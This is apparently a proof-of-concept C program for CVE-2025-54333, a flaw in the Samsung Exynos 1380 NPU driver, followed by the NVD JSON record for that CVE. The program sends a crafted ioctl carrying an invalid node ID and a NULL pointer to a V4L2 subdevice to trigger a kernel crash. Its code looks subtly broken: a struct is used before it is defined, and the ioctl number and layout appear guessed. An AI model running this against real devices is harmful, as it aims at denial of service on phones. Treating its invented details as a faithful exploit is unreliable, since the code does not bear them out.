CVE-2025-54333

/* * CVE-2025-54333 PoC - Invalid Pointer Dereference in Exynos 1380 NPU * Target: Samsung Exynos 1380 NPU driver * This PoC demonstrates triggering the vulnerability via V4L2 IOCTL * Note: Requires local access to /dev/v4l-subdev* device nodes */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <stdint.h> // V4L2 subdev IOCTL definitions #define VIDIOC_SUBDEV_QUERYCAP _IOR('V', 0, struct v4l2_subdev_capability) #define VIDIOC_SUBDEV_G_FMT _IOWR('V', 4, struct v4l2_subdev_format) struct v4l2_subdev_capability { uint32_t version; uint32_t capabilities; uint32_t device_caps; }; struct v4l2_subdev_format { uint32_t which; uint32_t pad; struct v4l2_pix_format format; }; struct v4l2_pix_format { uint32_t width; uint32_t height; uint32_t pixelformat; uint32_t field; uint32_t bytesperline; uint32_t sizeimage; uint32_t colorspace; uint32_t priv; }; int main(int argc, char *argv[]) { int fd; const char *device = "/dev/v4l-subdev0"; if (argc > 1) { device = argv[1]; } printf("Opening NPU subdev: %s\n", device); fd = open(device, O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } // Attempt to trigger get_vs4l_profiler_node vulnerability // by sending malformed profiler node request struct { uint32_t node_id; uint32_t flags; void *profiler_data; } vs4l_profiler_node = { .node_id = 0xFFFFFFFF, // Invalid node ID .flags = 0, .profiler_data = NULL // NULL pointer to trigger dereference }; printf("Sending crafted IOCTL to trigger get_vs4l_profiler_node...\n"); // IOCTL to trigger profiler node access long ret = ioctl(fd, _IOWR('V', 100, typeof(vs4l_profiler_node)), &vs4l_profiler_node); if (ret < 0) { printf("IOCTL failed (expected) - error: %ld\n", ret); printf("Vulnerability trigger attempted.\n"); } close(fd); return 0; }

{"cve": {"id": "CVE-2025-54333", "sourceIdentifier": "[email protected]", "published": "2025-11-04T18:16:45.377", "lastModified": "2025-11-07T12:56:49.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in NPU in Samsung Mobile Processor Exynos 1380 through July 2025. There is an Invalid Pointer Dereference of node in the get_vs4l_profiler_node function."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-763"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-07", "matchCriteriaId": "8A422138-B9FF-406B-A358-783E427FBF51"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54333/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}